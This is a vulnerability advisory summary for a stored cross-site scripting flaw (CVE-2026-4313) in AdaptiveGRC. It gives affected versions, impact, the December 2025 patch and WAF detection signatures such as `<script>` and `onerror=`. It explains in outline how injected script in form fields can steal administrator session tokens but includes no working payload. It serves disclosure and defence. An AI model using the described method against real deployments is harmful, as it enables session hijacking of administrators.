Full Report
Cross-site Scripting vulnerability (CVE-2026-4313) has been found in AdaptiveGRC software.
Analysis Summary
# Vulnerability: Stored Cross-Site Scripting (XSS) in AdaptiveGRC
## CVE Details
- **CVE ID**: CVE-2026-4313
- **CVSS Score**: Not explicitly provided in the article (High severity implied)
- **CWE**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
## Affected Systems
- **Products**: AdaptiveGRC (by vendor C&F)
- **Versions**: All versions released before December 2025.
- **Configurations**: Standard web interface deployments using text-type fields in forms.
## Vulnerability Description
AdaptiveGRC is vulnerable to a Stored Cross-site Scripting (XSS) flaw. The vulnerability exists within text-type fields used across various internal forms. An authenticated attacker can intercept and modify an HTTP POST request to inject malicious scripts into these fields. Due to improper server-side input validation and sanitization, the injected JavaScript is stored on the server and subsequently executed in the browser of any user (including administrators) who views the affected page.
## Exploitation
- **Status**: Reported via Coordinated Vulnerability Disclosure (CVD). No active exploitation in the wild mentioned.
- **Complexity**: Low (requires basic interception/modification of POST requests).
- **Attack Vector**: Network (Authenticated).
## Impact
- **Confidentiality**: High (Potential theft of administrator authentication tokens and session hijacking).
- **Integrity**: High (Ability to perform arbitrary actions with administrative privileges).
- **Availability**: Medium (Potential for UI defacement or disruption of administrative functions).
## Remediation
### Patches
- Users should update to the version of AdaptiveGRC released in **December 2025** or later, which contains the fix for this vulnerability.
### Workarounds
- No specific workarounds are provided in the advisory; however, limiting access to the application to trusted personnel only can reduce the risk of authenticated exploitation.
## Detection
- **Indicators of Compromise**: Monitoring for suspicious `<script>` tags or unusual payloads in HTTP POST request parameters targeting form fields.
- **Detection methods and tools**:
- Review web server logs for administrative sessions originating from unexpected IP addresses (potential session hijacking).
- Utilize Web Application Firewalls (WAF) with signatures for XSS patterns (e.g., `<script>`, `onerror=`, `onload=`).
## References
- CERT Polska Advisory: hxxps[://]cert[.]pl/en/posts/2026/04/cve-2026-4313/
- CVE Record: hxxps[://]www[.]cve[.]org/CVERecord?id=CVE-2026-4313
- Vendor Site: hxxp[://]candf[.]com/ (C&F)